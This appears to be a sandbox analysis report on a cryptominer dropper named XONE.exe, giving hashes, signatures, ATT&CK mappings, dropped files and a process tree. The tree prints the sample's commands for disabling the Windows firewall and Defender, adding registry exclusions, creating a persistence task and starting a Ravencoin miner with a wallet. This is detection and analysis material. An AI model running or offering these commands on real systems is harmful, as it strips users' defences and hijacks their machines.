Analysis

  • max time kernel
    600s
  • max time network
    602s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-07-2024 17:14

General

  • Target

    XONE.exe

  • Size

    38.0MB

  • MD5

    747325288a489b3c6863573f3e72104b

  • SHA1

    14e39695af5942d151c008b813580160604d85e3

  • SHA256

    7bfb4db002139d04fcf233d3384ba2c15c14e01d69d26327dc7ed918731b6194

  • SHA512

    0258556daf1368dd58c651df6a4fd5e028a5217282a47a63b2fbbf08e20588cab57ca578e5e288868ed00ef30de2e5a43ca099aef7431d7dcac5b5d4c5436463

  • SSDEEP

    786432:xy4byV7+uCOd9dFtuAJ1vyskeQ6T7tHckEz5lgYmErmRA+RlnS+kktWW8jz:xy4byV7+u5IATvJkb6PqL5ltm55NltWW

Malware Config

Signatures

  • Windows security bypass 2 TTPs 8 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 45 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 18 IoCs
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\XONE.exe
    "C:\Users\Admin\AppData\Local\Temp\XONE.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1692
    • C:\Users\Admin\AppData\Local\Temp\XONE.exe
      "C:\Users\Admin\AppData\Local\Temp\XONE.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\\Admin\Documents\updater_main.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Users\Admin\Documents\updater_main.exe
          C:\Users\\Admin\Documents\updater_main.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3560
          • C:\Users\Admin\Documents\updater_main.exe
            C:\Users\\Admin\Documents\updater_main.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:704
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\\miner.exe
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3312
              • C:\miner.exe
                C:\\miner.exe
                7⤵
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:4328
                • C:\ProgramData\Defender\ab.exe
                  C:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
                  8⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of WriteProcessMemory
                  PID:2600
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"
                    9⤵
                      PID:1284
                  • C:\ProgramData\Defender\ac1.exe
                    C:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4856
                    • C:\ProgramData\Defender\u.exe
                      "C:\ProgramData\Defender\u.exe"
                      9⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      PID:4808
                  • C:\ProgramData\Defender\u.exe
                    "C:\ProgramData\Defender\u.exe"
                    8⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    PID:3948
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1276
                    • C:\ProgramData\Defender\d.exe
                      "C:\ProgramData\Defender\d.exe" 70 C:\ProgramData\Defender\d1.exe
                      9⤵
                      • Executes dropped EXE
                      PID:824
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "
                      9⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4872
                      • C:\Windows\SysWOW64\netsh.exe
                        NetSh Advfirewall set allprofiles state off
                        10⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:412
                      • C:\Windows\SysWOW64\net.exe
                        net stop windefend
                        10⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5096
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop windefend
                          11⤵
                            PID:4580
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f
                          10⤵
                          • Windows security bypass
                          PID:2840
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f
                          10⤵
                          • Windows security bypass
                          PID:3740
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                          10⤵
                            PID:4252
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
                            10⤵
                              PID:3952
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
                              10⤵
                                PID:1824
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f
                                10⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:4256
                          • C:\ProgramData\Defender\ac.exe
                            C:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
                            8⤵
                            • Executes dropped EXE
                            PID:3308
                            • C:\ProgramData\Defender\c1.exe
                              "C:\ProgramData\Defender\c1.exe"
                              9⤵
                              • Executes dropped EXE
                              PID:360
                              • C:\ProgramData\Defender\Start.exe
                                C:\ProgramData\Defender\Start.exe
                                10⤵
                                • Executes dropped EXE
                                PID:4076
                                • C:\Windows\system32\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FE17.tmp\FE18.tmp\FE19.bat C:\ProgramData\Defender\Start.exe"
                                  11⤵
                                  • Modifies registry class
                                  PID:2488
                                  • C:\Windows\system32\timeout.exe
                                    TIMEOUT /t 10
                                    12⤵
                                    • Delays execution with timeout.exe
                                    PID:2888
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"
                                    12⤵
                                      PID:6120
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "
                                        13⤵
                                          PID:2440
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps1
                                            14⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4364
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g03dizuc\g03dizuc.cmdline"
                                              15⤵
                                                PID:4772
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28EF.tmp" "c:\Users\Admin\AppData\Local\Temp\g03dizuc\CSCC0C77072F80F4B00BDDADDAF8969A8C.TMP"
                                                  16⤵
                                                    PID:4544
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"
                                                  15⤵
                                                    PID:4580
                                                    • C:\ProgramData\Defender\Windows Protection.exe
                                                      "C:\ProgramData\Defender\Windows Protection.exe"
                                                      16⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4356
                                                    • C:\ProgramData\Defender\Windows Process.exe
                                                      "C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k
                                                      16⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3004
                                              • C:\ProgramData\Task Host\svchost.exe
                                                "C:\ProgramData\Task Host\svchost.exe"
                                                13⤵
                                                • Executes dropped EXE
                                                PID:3092
                                            • C:\ProgramData\Task Host\svchost.exe
                                              "C:\ProgramData\Task Host\svchost.exe"
                                              12⤵
                                              • Executes dropped EXE
                                              PID:6132
                                    • C:\Windows\SysWOW64\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"
                                      8⤵
                                        PID:708
                                        • C:\ProgramData\Defender\d.exe
                                          "C:\ProgramData\Defender\d.exe" 70 C:\ProgramData\Defender\d1.exe
                                          9⤵
                                          • Executes dropped EXE
                                          PID:3068
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "
                                          9⤵
                                            PID:1856
                                            • C:\Windows\SysWOW64\netsh.exe
                                              NetSh Advfirewall set allprofiles state off
                                              10⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:1628
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop windefend
                                              10⤵
                                                PID:5948
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop windefend
                                                  11⤵
                                                    PID:5964
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f
                                                  10⤵
                                                  • Windows security bypass
                                                  PID:5980
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f
                                                  10⤵
                                                  • Windows security bypass
                                                  PID:5996
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                  10⤵
                                                    PID:6012
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
                                                    10⤵
                                                      PID:6028
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
                                                      10⤵
                                                        PID:6044
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f
                                                        10⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:6060
                                    • \??\c:\windows\system32\gpscript.exe
                                      gpscript.exe /RefreshSystemParam
                                      1⤵
                                        PID:4940
                                      • \??\c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                        1⤵
                                          PID:4924
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                          1⤵
                                            PID:716
                                          • \??\c:\windows\system32\gpscript.exe
                                            gpscript.exe /RefreshSystemParam
                                            1⤵
                                              PID:3792
                                            • \??\c:\windows\system32\gpscript.exe
                                              gpscript.exe /RefreshSystemParam
                                              1⤵
                                                PID:4588
                                              • \??\c:\windows\system32\gpscript.exe
                                                gpscript.exe /RefreshSystemParam
                                                1⤵
                                                  PID:2212
                                                • \??\c:\windows\system32\gpscript.exe
                                                  gpscript.exe /RefreshSystemParam
                                                  1⤵
                                                    PID:4384
                                                  • \??\c:\windows\system32\gpscript.exe
                                                    gpscript.exe /RefreshSystemParam
                                                    1⤵
                                                      PID:2848
                                                    • \??\c:\windows\system32\gpscript.exe
                                                      gpscript.exe /RefreshSystemParam
                                                      1⤵
                                                        PID:376
                                                      • \??\c:\windows\system32\gpscript.exe
                                                        gpscript.exe /RefreshSystemParam
                                                        1⤵
                                                          PID:2236
                                                        • \??\c:\windows\system32\gpscript.exe
                                                          gpscript.exe /RefreshSystemParam
                                                          1⤵
                                                            PID:1840
                                                          • \??\c:\windows\system32\gpscript.exe
                                                            gpscript.exe /RefreshSystemParam
                                                            1⤵
                                                              PID:2016
                                                            • \??\c:\windows\system32\gpscript.exe
                                                              gpscript.exe /RefreshSystemParam
                                                              1⤵
                                                                PID:3292
                                                              • \??\c:\windows\system32\gpscript.exe
                                                                gpscript.exe /RefreshSystemParam
                                                                1⤵
                                                                  PID:1564
                                                                • \??\c:\windows\system32\gpscript.exe
                                                                  gpscript.exe /RefreshSystemParam
                                                                  1⤵
                                                                    PID:4680
                                                                  • \??\c:\windows\system32\gpscript.exe
                                                                    gpscript.exe /RefreshSystemParam
                                                                    1⤵
                                                                      PID:4568
                                                                    • \??\c:\windows\system32\gpscript.exe
                                                                      gpscript.exe /RefreshSystemParam
                                                                      1⤵
                                                                        PID:2880
                                                                      • \??\c:\windows\system32\gpscript.exe
                                                                        gpscript.exe /RefreshSystemParam
                                                                        1⤵
                                                                          PID:1120
                                                                        • \??\c:\windows\system32\gpscript.exe
                                                                          gpscript.exe /RefreshSystemParam
                                                                          1⤵
                                                                            PID:3812
                                                                          • \??\c:\windows\system32\gpscript.exe
                                                                            gpscript.exe /RefreshSystemParam
                                                                            1⤵
                                                                              PID:2316
                                                                            • \??\c:\windows\system32\gpscript.exe
                                                                              gpscript.exe /RefreshSystemParam
                                                                              1⤵
                                                                                PID:2884
                                                                              • \??\c:\windows\system32\gpscript.exe
                                                                                gpscript.exe /RefreshSystemParam
                                                                                1⤵
                                                                                  PID:4204

                                                                                Network

                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                Execution

                                                                                Command and Scripting Interpreter

                                                                                1
                                                                                T1059

                                                                                PowerShell

                                                                                1
                                                                                T1059.001

                                                                                Scheduled Task/Job

                                                                                1
                                                                                T1053

                                                                                Scheduled Task

                                                                                1
                                                                                T1053.005

                                                                                Persistence

                                                                                Create or Modify System Process

                                                                                1
                                                                                T1543

                                                                                Windows Service

                                                                                1
                                                                                T1543.003

                                                                                Event Triggered Execution

                                                                                1
                                                                                T1546

                                                                                Netsh Helper DLL

                                                                                1
                                                                                T1546.007

                                                                                Scheduled Task/Job

                                                                                1
                                                                                T1053

                                                                                Scheduled Task

                                                                                1
                                                                                T1053.005

                                                                                Privilege Escalation

                                                                                Create or Modify System Process

                                                                                1
                                                                                T1543

                                                                                Windows Service

                                                                                1
                                                                                T1543.003

                                                                                Event Triggered Execution

                                                                                1
                                                                                T1546

                                                                                Netsh Helper DLL

                                                                                1
                                                                                T1546.007

                                                                                Scheduled Task/Job

                                                                                1
                                                                                T1053

                                                                                Scheduled Task

                                                                                1
                                                                                T1053.005

                                                                                Defense Evasion

                                                                                Impair Defenses

                                                                                2
                                                                                T1562

                                                                                Disable or Modify Tools

                                                                                1
                                                                                T1562.001

                                                                                Disable or Modify System Firewall

                                                                                1
                                                                                T1562.004

                                                                                Modify Registry

                                                                                1
                                                                                T1112

                                                                                Discovery

                                                                                System Information Discovery

                                                                                1
                                                                                T1082

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\ProgramData\Defender\Windows Process.exe
                                                                                  Filesize

                                                                                  11.1MB

                                                                                  MD5

                                                                                  b09498b7a5e6794d2fab7827e5544de4

                                                                                  SHA1

                                                                                  0a39e5696cb90d4f7c44c6220da3f0897d6b5938

                                                                                  SHA256

                                                                                  9532f18b0f78901cda83b717f5543a0435b43ea23b968de992e27c5b8961415d

                                                                                  SHA512

                                                                                  6c17712348f07710b79647e5322fa056aeaea327027e42dfed9e0c6283a2a7bdef6722c661ed56d68a55d7e516a7cb63040ac30d9d0f8469a3cb282605ff4ba2

                                                                                • C:\ProgramData\Defender\ab.exe
                                                                                  Filesize

                                                                                  766KB

                                                                                  MD5

                                                                                  fc846968d7791ad9d6392bdd6dec80fa

                                                                                  SHA1

                                                                                  bee026f7dcea0d2643807de0930c8542f4dc93c5

                                                                                  SHA256

                                                                                  952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b

                                                                                  SHA512

                                                                                  c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6

                                                                                • C:\ProgramData\Defender\ac.exe
                                                                                  Filesize

                                                                                  16.5MB

                                                                                  MD5

                                                                                  f947c1c1296a4793dafbabba529252e2

                                                                                  SHA1

                                                                                  51927e8606ec8664a1e30e2cabbebee4b0160f2a

                                                                                  SHA256

                                                                                  a68c00b5e362f6ecd1e7fe423f5ea633441ae00c784246c0f8dda15f7d1aa092

                                                                                  SHA512

                                                                                  84e5f9e706dbbaf1c1b0afa4215500ed5abd13b7cffc2d24adeb0c2d2f765bf8a04bcd9e1cd43e243215e25009f9fe5d4436d6b52215aff264f2c8ea1ceb4e7b

                                                                                • C:\ProgramData\Defender\c1.exe
                                                                                  Filesize

                                                                                  16.7MB

                                                                                  MD5

                                                                                  b414742cd803379a82cfe84700c78feb

                                                                                  SHA1

                                                                                  d896017b0bb1fb110e261ddd78483648fe61df48

                                                                                  SHA256

                                                                                  949951c34a752b40e5f1f727c45a208a70f05e34ae06387607e08a7aeb39e682

                                                                                  SHA512

                                                                                  d7c02464347e4dd7169d3da568f69b9f607b0a8ef24485214ebd0e5e6260bcc77527f30000c02b778b281da38855f4448a5e39213f023627282a8b9c08532333

                                                                                • C:\ProgramData\Defender\d.exe
                                                                                  Filesize

                                                                                  220KB

                                                                                  MD5

                                                                                  e8145dd7cb07d6029de3ac41979623f8

                                                                                  SHA1

                                                                                  af1ca5b5ff8c80a38998fb0f19ab59eb3fc43d65

                                                                                  SHA256

                                                                                  edc4664c9fb22c34c1139bb326c803b78a4b3783885a0619841a780a77d87369

                                                                                  SHA512

                                                                                  de0ffb1a0b8e4dae15393c0cf1b44512c300546ca5e6cad60b344758314fdb7fc5f4a4dd2f3270348dbd4ed734a84bef73d7013b0e27e4438d9fae6ac48a4dcd

                                                                                • C:\ProgramData\Defender\d.vbs
                                                                                  Filesize

                                                                                  288B

                                                                                  MD5

                                                                                  44f0cd5bb0b87d1e09863f19ee9f52ea

                                                                                  SHA1

                                                                                  251e295c00d307dc67666f9d28c58b190a661a3c

                                                                                  SHA256

                                                                                  7a4cfffc6dfe0fa974769c6c9ee6d88ba51abb953e23ad599262c99f9c59d0c6

                                                                                  SHA512

                                                                                  a644311184035378c14739dfabb32dbfa300c7e8f43ba10ea456d7457e6994cae7b4a6b7a6caace41d93354d051a251c27a6907e5de371b81b2fe6abfa78fca5

                                                                                • C:\ProgramData\Defender\dd.vbs
                                                                                  Filesize

                                                                                  288B

                                                                                  MD5

                                                                                  7f6aeff67cf0ff0525016e06273317c5

                                                                                  SHA1

                                                                                  faed754543e1c18926bea3e076c08a6faf650dcc

                                                                                  SHA256

                                                                                  7ba00db5d700ccb9208db43b3f373e054d61594873d05430404f620d4d0deea1

                                                                                  SHA512

                                                                                  fc78f91ca1774aae9cb798aefb53b57464c3ac3c8cf05d966b71a077bf4b065822a46270ea1289d25f7ac7190f89e537759996f6ee4caa4179a5309b43ed8a40

                                                                                • C:\ProgramData\Defender\t.bat
                                                                                  Filesize

                                                                                  732B

                                                                                  MD5

                                                                                  8c526aef3d9ff3365c92877aa3069758

                                                                                  SHA1

                                                                                  559c2987c0209be0fe16315c553a6505323fc8db

                                                                                  SHA256

                                                                                  d2873016df2a468a0d506ebc7bde3c413dd9ae5ece08073ede7e9e263bd59d9b

                                                                                  SHA512

                                                                                  ea16fa435a24fea5ca1f1c4abf6c05556b877e44668d6a587ed8c3d6a2d79d4dcd85d238a297f1ff0f2e362e6a5995217ede0f6dbcc15c5a12176f9bdba0bd5c

                                                                                • C:\ProgramData\Defender\u.exe
                                                                                  Filesize

                                                                                  14KB

                                                                                  MD5

                                                                                  73bdcc03365a915741a98a9bf7a0d05a

                                                                                  SHA1

                                                                                  0839bdf18a803dfaacc20be0532094d191291924

                                                                                  SHA256

                                                                                  9108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f

                                                                                  SHA512

                                                                                  e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\u.exe.log
                                                                                  Filesize

                                                                                  42B

                                                                                  MD5

                                                                                  84cfdb4b995b1dbf543b26b86c863adc

                                                                                  SHA1

                                                                                  d2f47764908bf30036cf8248b9ff5541e2711fa2

                                                                                  SHA256

                                                                                  d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

                                                                                  SHA512

                                                                                  485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\VCRUNTIME140.dll
                                                                                  Filesize

                                                                                  96KB

                                                                                  MD5

                                                                                  f12681a472b9dd04a812e16096514974

                                                                                  SHA1

                                                                                  6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                                                  SHA256

                                                                                  d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                                                  SHA512

                                                                                  7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\_cffi_backend.cp310-win_amd64.pyd
                                                                                  Filesize

                                                                                  179KB

                                                                                  MD5

                                                                                  282b92ef9ed04c419564fbaee2c5cdbe

                                                                                  SHA1

                                                                                  e19b54d6ab67050c80b36a016b539cbe935568d5

                                                                                  SHA256

                                                                                  5763c1d29903567cde4d46355d3a7380d10143543986ca4eebfca4d22d991e3e

                                                                                  SHA512

                                                                                  3ddebdc28d0add9063ee6d41f14331898f92452a13762b6c4c9aa5a83dde89510176425c11a48591fa05c949cb35218bf421f1974e33eb8133a1b95ea74e4941

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\base_library.zip
                                                                                  Filesize

                                                                                  1.0MB

                                                                                  MD5

                                                                                  b9605795c84c7cc6eb221ae92c10aa83

                                                                                  SHA1

                                                                                  4e734f87c2829352362d9466b3ef76b36d060db0

                                                                                  SHA256

                                                                                  717ec1654e4440bca6784163d55e3010757d932cf0868fd113ce8562daa20bbd

                                                                                  SHA512

                                                                                  065a3c44d2bc1601d957a9ac76347e151878b9296da820d872f9260402e8c1485177661643a6e41b790cbe64367c4a99814af3ca258ca51c4766150fdfa51c41

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\cryptography\hazmat\bindings\_openssl.pyd
                                                                                  Filesize

                                                                                  3.8MB

                                                                                  MD5

                                                                                  772cace2ab493c306930c01050a5b667

                                                                                  SHA1

                                                                                  5130913527cb73ca1358875f63464907088f0a5b

                                                                                  SHA256

                                                                                  da0dea85eb34de0e50ab1d343d33ed0a99b3af5e2f479d306fce5c0ed604b1d8

                                                                                  SHA512

                                                                                  b0019a4ff07a5d76e1c01dd7079ea9eae5bd1cede64af917ba94206ad434acf946efad90ebfd240cfefcdb22c8ca732af659e4408105a9ff130545950ed1bd2d

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\cryptography\hazmat\bindings\_rust.pyd
                                                                                  Filesize

                                                                                  1.6MB

                                                                                  MD5

                                                                                  7d6f3ad57f25c087286a55fe1ecd55db

                                                                                  SHA1

                                                                                  df87721286061ef3e5687fd29924c025d230c9e9

                                                                                  SHA256

                                                                                  bca2dd906302a6a84e9aa5f41b06c4deef4fee139e861d5c538ba30bd4c40574

                                                                                  SHA512

                                                                                  8a042d70956c6d8d617b9fb73f942209c4396cee11a8ef64b8cce77f5989ac5fc728f04353b342beb1823953c6e73fdc50ccdc0d72721b81f515581ca5c32f6a

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\enc_main.exe
                                                                                  Filesize

                                                                                  34.3MB

                                                                                  MD5

                                                                                  0c010f4f8c3453b464092697ece23fbb

                                                                                  SHA1

                                                                                  272099b4b68e46f36622fe03bee029be037e96a4

                                                                                  SHA256

                                                                                  4edac4377889bc21ed8cff698b9cdcb54ff5a6bda0e52e961205259e90b6caa0

                                                                                  SHA512

                                                                                  0d0b992118454b9f3cc0e07723783c1aae1eb82b7302d35ea27504032c5c001561a242e2fde1f2749528335a092bf75368f25fa56875ed874b94a7c72c52599a

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\libcrypto-1_1.dll
                                                                                  Filesize

                                                                                  3.3MB

                                                                                  MD5

                                                                                  ab01c808bed8164133e5279595437d3d

                                                                                  SHA1

                                                                                  0f512756a8db22576ec2e20cf0cafec7786fb12b

                                                                                  SHA256

                                                                                  9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55

                                                                                  SHA512

                                                                                  4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\pyarmor_runtime_000000\pyarmor_runtime.pyd
                                                                                  Filesize

                                                                                  619KB

                                                                                  MD5

                                                                                  c3496997ce3e3fc92e7345db9d9e62fc

                                                                                  SHA1

                                                                                  44b6aa70a7c2e875ef28a0dd9fc1870aee6f93ff

                                                                                  SHA256

                                                                                  c9c2be86d88b689524d0a8aa64499bbb42bbab2a33c2c818b99fae43a0139d99

                                                                                  SHA512

                                                                                  669d332696c1ccb9d88f09b948b610a968072b0bb1f7967a2a1193ee4c5fc6d24fb656c47a2cf42672e59f639c5bdab04b78a4266d177b29fe7e88074fd922a3

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\python3.DLL
                                                                                  Filesize

                                                                                  63KB

                                                                                  MD5

                                                                                  07bd9f1e651ad2409fd0b7d706be6071

                                                                                  SHA1

                                                                                  dfeb2221527474a681d6d8b16a5c378847c59d33

                                                                                  SHA256

                                                                                  5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5

                                                                                  SHA512

                                                                                  def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\python310.dll
                                                                                  Filesize

                                                                                  4.3MB

                                                                                  MD5

                                                                                  c80b5cb43e5fe7948c3562c1fff1254e

                                                                                  SHA1

                                                                                  f73cb1fb9445c96ecd56b984a1822e502e71ab9d

                                                                                  SHA256

                                                                                  058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20

                                                                                  SHA512

                                                                                  faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI16922\ucrtbase.dll
                                                                                  Filesize

